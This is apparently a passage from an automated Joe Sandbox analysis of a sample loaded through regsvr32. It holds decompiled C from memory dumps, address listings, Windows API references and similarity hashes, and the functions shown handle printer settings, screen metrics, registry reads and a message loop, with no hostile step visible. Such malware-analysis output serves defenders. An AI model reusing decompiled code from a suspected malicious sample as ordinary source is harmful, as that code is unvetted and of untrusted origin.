                                                                                                                                                                            				if(_t15 != 0) {
                                                                                                                                                                            					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                            						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                                                                                                                                                                            						if(_t15 != 0) {
                                                                                                                                                                            							_t18 =  *(_t35 + 0x70);
                                                                                                                                                                            							if( *(_t35 + 0x70) != 0) {
                                                                                                                                                                            								E10014056(_t18);
                                                                                                                                                                            							}
                                                                                                                                                                            							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                                                                                                                                                                            							 *(_t35 + 0x70) = _t20;
                                                                                                                                                                            							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                                                                                                                                                                            								E10014056( *(_t35 + 0x70));
                                                                                                                                                                            								 *(_t35 + 0x70) = 0;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t15 = ClosePrinter(_v8);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t15;
                                                                                                                                                                            			}







                                                                                                                                                                            0x1000a6e6
                                                                                                                                                                            0x1000a6e8
                                                                                                                                                                            0x1000a6ea
                                                                                                                                                                            0x1000a6f2
                                                                                                                                                                            0x1000a70c
                                                                                                                                                                            0x1000a714
                                                                                                                                                                            0x1000a71e
                                                                                                                                                                            0x1000a725
                                                                                                                                                                            0x1000a727
                                                                                                                                                                            0x1000a72c
                                                                                                                                                                            0x1000a72f
                                                                                                                                                                            0x1000a72f
                                                                                                                                                                            0x1000a746
                                                                                                                                                                            0x1000a74d
                                                                                                                                                                            0x1000a765
                                                                                                                                                                            0x1000a76a
                                                                                                                                                                            0x1000a76f
                                                                                                                                                                            0x1000a76f
                                                                                                                                                                            0x1000a775
                                                                                                                                                                            0x1000a775
                                                                                                                                                                            0x1000a725
                                                                                                                                                                            0x1000a77a
                                                                                                                                                                            0x1000a77e

                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 1000A700
                                                                                                                                                                            • lstrcmpA.KERNEL32(?,?), ref: 1000A70C
                                                                                                                                                                            • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1000A71E
                                                                                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A73E
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A746
                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 1000A750
                                                                                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1000A75D
                                                                                                                                                                            • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1000A775
                                                                                                                                                                              • Part of subcall function 10014056: GlobalFlags.KERNEL32(?), ref: 10014061
                                                                                                                                                                              • Part of subcall function 10014056: GlobalUnlock.KERNEL32(?,?,?,1000A4C2,?,00000004,1000146F), ref: 10014073
                                                                                                                                                                              • Part of subcall function 10014056: GlobalFree.KERNEL32 ref: 1001407E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 168474834-0
                                                                                                                                                                            • Opcode ID: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
                                                                                                                                                                            • Instruction ID: f32a97280aef975bd063cd01cc2dace1ac46c13f829f9411547ae7bffa227ebc
                                                                                                                                                                            • Opcode Fuzzy Hash: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
                                                                                                                                                                            • Instruction Fuzzy Hash: ED11A075500600BBEB22CBBADC89DAF7AFDFB89B807104519F60AD5021DB31DD91DB20
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10013854(void* __ecx) {
                                                                                                                                                                            				struct HDC__* _t18;
                                                                                                                                                                            				void* _t19;
                                                                                                                                                                            
                                                                                                                                                                            				_t19 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
                                                                                                                                                                            				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
                                                                                                                                                                            				 *0x1005aa30 = GetSystemMetrics(2) + 1;
                                                                                                                                                                            				 *0x1005aa34 = GetSystemMetrics(3) + 1;
                                                                                                                                                                            				_t18 = GetDC(0);
                                                                                                                                                                            				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
                                                                                                                                                                            				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
                                                                                                                                                                            				return ReleaseDC(0, _t18);
                                                                                                                                                                            			}





                                                                                                                                                                            0x1001385f
                                                                                                                                                                            0x10013865
                                                                                                                                                                            0x1001386c
                                                                                                                                                                            0x10013874
                                                                                                                                                                            0x1001387e
                                                                                                                                                                            0x1001388f
                                                                                                                                                                            0x10013899
                                                                                                                                                                            0x100138a1
                                                                                                                                                                            0x100138ad

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10013861
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10013868
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 1001386F
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10013879
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 10013883
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 10013894
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1001389C
                                                                                                                                                                            • ReleaseDC.USER32 ref: 100138A4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1151147025-0
                                                                                                                                                                            • Opcode ID: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
                                                                                                                                                                            • Instruction ID: d97b14313f3971f9b273ebf2d99ed84bfce9517748686708ee6192b13dda979b
                                                                                                                                                                            • Opcode Fuzzy Hash: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
                                                                                                                                                                            • Instruction Fuzzy Hash: CEF03071A40714AFFB20AF728CC9F677BA8EB81B51F11491AE6428B6D0D7B59806CF50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                            			E1000BD98(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
                                                                                                                                                                            				char _v4;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				char* _v16;
                                                                                                                                                                            				void* _v20;
                                                                                                                                                                            				char* _v24;
                                                                                                                                                                            				char _v28;
                                                                                                                                                                            				long _v32;
                                                                                                                                                                            				char _v36;
                                                                                                                                                                            				char _v272;
                                                                                                                                                                            				char _v280;
                                                                                                                                                                            				intOrPtr _v292;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                            				char _t44;
                                                                                                                                                                            				void* _t47;
                                                                                                                                                                            				void* _t54;
                                                                                                                                                                            				char* _t61;
                                                                                                                                                                            				void* _t77;
                                                                                                                                                                            				void* _t80;
                                                                                                                                                                            				void* _t81;
                                                                                                                                                                            				intOrPtr _t94;
                                                                                                                                                                            				void* _t98;
                                                                                                                                                                            				void* _t100;
                                                                                                                                                                            				void* _t101;
                                                                                                                                                                            				char* _t104;
                                                                                                                                                                            
                                                                                                                                                                            				_t95 = __edx;
                                                                                                                                                                            				_t81 = __ecx;
                                                                                                                                                                            				_t79 = __ebx;
                                                                                                                                                                            				_t104 =  &_v272;
                                                                                                                                                                            				_t40 =  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				_a264 = _t40 ^ _t104;
                                                                                                                                                                            				_push(0x18);
                                                                                                                                                                            				E10017BC1(E10027F63, __ebx, __edi, __esi);
                                                                                                                                                                            				_t100 = __ecx;
                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                            				_t44 = E1000BB54(__ecx, __edx);
                                                                                                                                                                            				_v28 = _t44;
                                                                                                                                                                            				if(_t44 != 0) {
                                                                                                                                                                            					do {
                                                                                                                                                                            						__eax =  &_v28;
                                                                                                                                                                            						_push(__eax);
                                                                                                                                                                            						__ecx = __esi;
                                                                                                                                                                            						E1000BB65();
                                                                                                                                                                            						__eflags = __eax - __edi;
                                                                                                                                                                            						if(__eax != __edi) {
                                                                                                                                                                            							__edx =  *__eax;
                                                                                                                                                                            							__ecx = __eax;
                                                                                                                                                                            							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _v28 - __edi;
                                                                                                                                                                            					} while (_v28 != __edi);
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags =  *(_t100 + 0x54);
                                                                                                                                                                            				if( *(_t100 + 0x54) == 0) {
                                                                                                                                                                            					L15:
                                                                                                                                                                            					 *[fs:0x0] = _v12;
                                                                                                                                                                            					_pop(_t98);
                                                                                                                                                                            					_pop(_t101);
                                                                                                                                                                            					_pop(_t80);
                                                                                                                                                                            					_t47 = E100167D5(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
                                                                                                                                                                            					__eflags =  &_a268;
                                                                                                                                                                            					return _t47;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					__eflags =  *(_t100 + 0x68);
                                                                                                                                                                            					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						_push("Software\\");
                                                                                                                                                                            						E10009FA3(_t79,  &_v16, 0, _t100, __eflags);
                                                                                                                                                                            						_v4 = 0;
                                                                                                                                                                            						E10009F7E(_t79,  &_v16,  *(_t100 + 0x54));
                                                                                                                                                                            						_push(0x1002a248);
                                                                                                                                                                            						_push( &_v16);
                                                                                                                                                                            						_push( &_v36);
                                                                                                                                                                            						_t54 = E1000BC25(_t79, 0, _t100, __eflags);
                                                                                                                                                                            						_push( *(_t100 + 0x68));
                                                                                                                                                                            						_v4 = 1;
                                                                                                                                                                            						_push(_t54);
                                                                                                                                                                            						_push( &_v24);
                                                                                                                                                                            						E1000BC25(_t79, 0, _t100, __eflags);
                                                                                                                                                                            						_v4 = 3;
                                                                                                                                                                            						E10009CB7(_v36 + 0xfffffff0, _t95);
                                                                                                                                                                            						_push( &_v24);
                                                                                                                                                                            						_push(0x80000001);
                                                                                                                                                                            						E1000BC89(_t79, 0, 0x80000001, __eflags);
                                                                                                                                                                            						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
                                                                                                                                                                            						__eflags = _t61;
                                                                                                                                                                            						if(_t61 == 0) {
                                                                                                                                                                            							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								_push( &_v16);
                                                                                                                                                                            								_push(0x80000001);
                                                                                                                                                                            								E1000BC89(_t79, 0, 0x80000001, __eflags);
                                                                                                                                                                            							}
                                                                                                                                                                            							RegCloseKey(_v20);
                                                                                                                                                                            						}
                                                                                                                                                                            						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
                                                                                                                                                                            						E10009CB7( &(_v24[0xfffffffffffffff0]), _t95);
                                                                                                                                                                            						__eflags =  &(_v16[0xfffffffffffffff0]);
                                                                                                                                                                            						E10009CB7( &(_v16[0xfffffffffffffff0]), _t95);
                                                                                                                                                                            						goto L15;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_push(_t104);
                                                                                                                                                                            						_push(_t81);
                                                                                                                                                                            						_v280 = 0x10057298;
                                                                                                                                                                            						E10017C83( &_v280, 0x1002e2fc);
                                                                                                                                                                            						asm("int3");
                                                                                                                                                                            						_push(4);
                                                                                                                                                                            						E10017BC1(E10027DEC, _t79, 0, _t100);
                                                                                                                                                                            						_t94 = E10013965(0x104);
                                                                                                                                                                            						_v292 = _t94;
                                                                                                                                                                            						_t77 = 0;
                                                                                                                                                                            						_v280 = 0;
                                                                                                                                                                            						if(_t94 != 0) {
                                                                                                                                                                            							_t77 = E1000CF71(_t94);
                                                                                                                                                                            						}
                                                                                                                                                                            						return E10017C60(_t77);
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}




























                                                                                                                                                                            0x1000bd98
                                                                                                                                                                            0x1000bd98
                                                                                                                                                                            0x1000bd98
                                                                                                                                                                            0x1000bd9f
                                                                                                                                                                            0x1000bda3
                                                                                                                                                                            0x1000bdaa
                                                                                                                                                                            0x1000bdb0
                                                                                                                                                                            0x1000bdb7
                                                                                                                                                                            0x1000bdbe
                                                                                                                                                                            0x1000bdc0
                                                                                                                                                                            0x1000bdc3
                                                                                                                                                                            0x1000bdc6
                                                                                                                                                                            0x1000bdcd
                                                                                                                                                                            0x1000bdd0
                                                                                                                                                                            0x1000bdd2
                                                                                                                                                                            0x1000bdd2
                                                                                                                                                                            0x1000bdd5
                                                                                                                                                                            0x1000bdd6
                                                                                                                                                                            0x1000bdd8
                                                                                                                                                                            0x1000bddd
                                                                                                                                                                            0x1000bddf
                                                                                                                                                                            0x1000bde1
                                                                                                                                                                            0x1000bde8
                                                                                                                                                                            0x1000bdea
                                                                                                                                                                            0x1000bdea
                                                                                                                                                                            0x1000bded
                                                                                                                                                                            0x1000bded
                                                                                                                                                                            0x1000bdd2
                                                                                                                                                                            0x1000bdf2
                                                                                                                                                                            0x1000bdf5
                                                                                                                                                                            0x1000bed2
                                                                                                                                                                            0x1000bed8
                                                                                                                                                                            0x1000bee0
                                                                                                                                                                            0x1000bee1
                                                                                                                                                                            0x1000bee2
                                                                                                                                                                            0x1000beeb
                                                                                                                                                                            0x1000bef0
                                                                                                                                                                            0x1000bef7
                                                                                                                                                                            0x1000bdfb
                                                                                                                                                                            0x1000bdfd
                                                                                                                                                                            0x1000be03
                                                                                                                                                                            0x1000be05
                                                                                                                                                                            0x1000be0c
                                                                                                                                                                            0x1000be14
                                                                                                                                                                            0x1000be1f
                                                                                                                                                                            0x1000be22
                                                                                                                                                                            0x1000be27
                                                                                                                                                                            0x1000be2f
                                                                                                                                                                            0x1000be33
                                                                                                                                                                            0x1000be34
                                                                                                                                                                            0x1000be39
                                                                                                                                                                            0x1000be3c
                                                                                                                                                                            0x1000be40
                                                                                                                                                                            0x1000be44
                                                                                                                                                                            0x1000be45
                                                                                                                                                                            0x1000be53
                                                                                                                                                                            0x1000be57
                                                                                                                                                                            0x1000be5f
                                                                                                                                                                            0x1000be65
                                                                                                                                                                            0x1000be66
                                                                                                                                                                            0x1000be73
                                                                                                                                                                            0x1000be79
                                                                                                                                                                            0x1000be7b
                                                                                                                                                                            0x1000be90
                                                                                                                                                                            0x1000be95
                                                                                                                                                                            0x1000be9a
                                                                                                                                                                            0x1000be9b
                                                                                                                                                                            0x1000be9c
                                                                                                                                                                            0x1000be9c
                                                                                                                                                                            0x1000bea4
                                                                                                                                                                            0x1000bea4
                                                                                                                                                                            0x1000beb6
                                                                                                                                                                            0x1000bec2
                                                                                                                                                                            0x1000beca
                                                                                                                                                                            0x1000becd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000be07
                                                                                                                                                                            0x1000a0db
                                                                                                                                                                            0x1000a0de
                                                                                                                                                                            0x1000a0e8
                                                                                                                                                                            0x1000a0ef
                                                                                                                                                                            0x1000a0f4
                                                                                                                                                                            0x1000a0f5
                                                                                                                                                                            0x1000a0fc
                                                                                                                                                                            0x1000a10b
                                                                                                                                                                            0x1000a10d
                                                                                                                                                                            0x1000a110
                                                                                                                                                                            0x1000a114
                                                                                                                                                                            0x1000a117
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a123
                                                                                                                                                                            0x1000a123
                                                                                                                                                                            0x1000be05

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 1000BDB7
                                                                                                                                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1000BE73
                                                                                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BE8A
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 1000BEA4
                                                                                                                                                                            • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1000BEB6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                                                                            • String ID: Software\
                                                                                                                                                                            • API String ID: 3878845136-964853688
                                                                                                                                                                            • Opcode ID: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
                                                                                                                                                                            • Instruction ID: bb9b01b2753fba5bda47465ad6778d866e06322e4a0b808ca87f46191af68194
                                                                                                                                                                            • Opcode Fuzzy Hash: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
                                                                                                                                                                            • Instruction Fuzzy Hash: 6241AC31900559AFEB11DFA4CC81EFEB7B9EF48390F20052AF552E2294DB74AA45CB61
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E1000F6F2(intOrPtr* __ecx, signed int _a4) {
                                                                                                                                                                            				struct HWND__* _v4;
                                                                                                                                                                            				struct tagMSG* _v8;
                                                                                                                                                                            				int _v12;
                                                                                                                                                                            				int _v16;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				struct HWND__* _t42;
                                                                                                                                                                            				struct tagMSG* _t43;
                                                                                                                                                                            				signed int _t45;
                                                                                                                                                                            				void* _t48;
                                                                                                                                                                            				void* _t50;
                                                                                                                                                                            				int _t53;
                                                                                                                                                                            				long _t56;
                                                                                                                                                                            				signed int _t62;
                                                                                                                                                                            				intOrPtr* _t64;
                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                            				void* _t68;
                                                                                                                                                                            
                                                                                                                                                                            				_t63 = __ecx;
                                                                                                                                                                            				_t62 = 1;
                                                                                                                                                                            				_t67 = __ecx;
                                                                                                                                                                            				_v12 = 1;
                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                            				if((_a4 & 0x00000004) == 0 || (E10012862(__ecx) & 0x10000000) != 0) {
                                                                                                                                                                            					_t62 = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t42 = GetParent( *(_t67 + 0x20));
                                                                                                                                                                            				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
                                                                                                                                                                            				_v4 = _t42;
                                                                                                                                                                            				_t43 = E1000B519(0);
                                                                                                                                                                            				_t68 = UpdateWindow;
                                                                                                                                                                            				_v8 = _t43;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L14:
                                                                                                                                                                            					_t73 = _v12;
                                                                                                                                                                            					if(_v12 == 0) {
                                                                                                                                                                            						goto L15;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							L15:
                                                                                                                                                                            							_t45 = E1000B911(_t63, 0, _t67, _t73);
                                                                                                                                                                            							if(_t45 == 0) {
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_t62 != 0) {
                                                                                                                                                                            								_t53 = _v8->message;
                                                                                                                                                                            								if(_t53 == 0x118 || _t53 == 0x104) {
                                                                                                                                                                            									E100128D7(_t67, 1);
                                                                                                                                                                            									UpdateWindow( *(_t67 + 0x20));
                                                                                                                                                                            									_t62 = 0;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							_t64 = _t67;
                                                                                                                                                                            							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
                                                                                                                                                                            							_t79 = _t48;
                                                                                                                                                                            							if(_t48 == 0) {
                                                                                                                                                                            								_t39 = _t67 + 0x3c;
                                                                                                                                                                            								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
                                                                                                                                                                            								__eflags =  *_t39;
                                                                                                                                                                            								return  *((intOrPtr*)(_t67 + 0x44));
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t50 = E1000B82B(_t62, _t64, 0, _t67, _t68, _t79, _v8);
                                                                                                                                                                            								_pop(_t63);
                                                                                                                                                                            								if(_t50 != 0) {
                                                                                                                                                                            									_v12 = 1;
                                                                                                                                                                            									_v16 = 0;
                                                                                                                                                                            								}
                                                                                                                                                                            								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
                                                                                                                                                                            									continue;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L14;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						_push(0);
                                                                                                                                                                            						E1000A5E4();
                                                                                                                                                                            						return _t45 | 0xffffffff;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t62;
                                                                                                                                                                            					if(_t62 != 0) {
                                                                                                                                                                            						_t63 = _t67;
                                                                                                                                                                            						E100128D7(_t67, 1);
                                                                                                                                                                            						UpdateWindow( *(_t67 + 0x20));
                                                                                                                                                                            						_t62 = 0;
                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _a4 & 0x00000001;
                                                                                                                                                                            					if((_a4 & 0x00000001) == 0) {
                                                                                                                                                                            						__eflags = _v4;
                                                                                                                                                                            						if(_v4 != 0) {
                                                                                                                                                                            							__eflags = _v16;
                                                                                                                                                                            							if(_v16 == 0) {
                                                                                                                                                                            								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _a4 & 0x00000002;
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						L13:
                                                                                                                                                                            						_v12 = 0;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
                                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                                            						__eflags = _t56;
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L13;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L15;
                                                                                                                                                                            			}






















                                                                                                                                                                            0x1000f6f2
                                                                                                                                                                            0x1000f6fb
                                                                                                                                                                            0x1000f703
                                                                                                                                                                            0x1000f705
                                                                                                                                                                            0x1000f709
                                                                                                                                                                            0x1000f70d
                                                                                                                                                                            0x1000f71b
                                                                                                                                                                            0x1000f71b
                                                                                                                                                                            0x1000f720
                                                                                                                                                                            0x1000f726
                                                                                                                                                                            0x1000f72a
                                                                                                                                                                            0x1000f72e
                                                                                                                                                                            0x1000f733
                                                                                                                                                                            0x1000f739
                                                                                                                                                                            0x1000f7b1
                                                                                                                                                                            0x1000f7b1
                                                                                                                                                                            0x1000f7b1
                                                                                                                                                                            0x1000f7b5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000f74d
                                                                                                                                                                            0x1000f74f
                                                                                                                                                                            0x1000f7b7
                                                                                                                                                                            0x1000f7b7
                                                                                                                                                                            0x1000f7b7
                                                                                                                                                                            0x1000f7be
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000f7c2
                                                                                                                                                                            0x1000f7c8
                                                                                                                                                                            0x1000f7d0
                                                                                                                                                                            0x1000f7dd
                                                                                                                                                                            0x1000f7e5
                                                                                                                                                                            0x1000f7e7
                                                                                                                                                                            0x1000f7e7
                                                                                                                                                                            0x1000f7d0
                                                                                                                                                                            0x1000f7eb
                                                                                                                                                                            0x1000f7ed
                                                                                                                                                                            0x1000f7f3
                                                                                                                                                                            0x1000f7f5
                                                                                                                                                                            0x1000f830
                                                                                                                                                                            0x1000f830
                                                                                                                                                                            0x1000f830
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000f7f7
                                                                                                                                                                            0x1000f7fb
                                                                                                                                                                            0x1000f802
                                                                                                                                                                            0x1000f803
                                                                                                                                                                            0x1000f805
                                                                                                                                                                            0x1000f80d
                                                                                                                                                                            0x1000f80d
                                                                                                                                                                            0x1000f821
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000f823
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000f823
                                                                                                                                                                            0x1000f821
                                                                                                                                                                            0x1000f7f5
                                                                                                                                                                            0x1000f825
                                                                                                                                                                            0x1000f826
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000f82b
                                                                                                                                                                            0x1000f751
                                                                                                                                                                            0x1000f753
                                                                                                                                                                            0x1000f757
                                                                                                                                                                            0x1000f759
                                                                                                                                                                            0x1000f761
                                                                                                                                                                            0x1000f763
                                                                                                                                                                            0x1000f763
                                                                                                                                                                            0x1000f763
                                                                                                                                                                            0x1000f765
                                                                                                                                                                            0x1000f76a
                                                                                                                                                                            0x1000f76c
                                                                                                                                                                            0x1000f770
                                                                                                                                                                            0x1000f772
                                                                                                                                                                            0x1000f776
                                                                                                                                                                            0x1000f785
                                                                                                                                                                            0x1000f785
                                                                                                                                                                            0x1000f776
                                                                                                                                                                            0x1000f770
                                                                                                                                                                            0x1000f78b
                                                                                                                                                                            0x1000f790
                                                                                                                                                                            0x1000f7ad
                                                                                                                                                                            0x1000f7ad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000f792
                                                                                                                                                                            0x1000f79f
                                                                                                                                                                            0x1000f7a5
                                                                                                                                                                            0x1000f7a9
                                                                                                                                                                            0x1000f7ab
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000f7ab
                                                                                                                                                                            0x1000f790
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetParent.USER32(?), ref: 1000F720
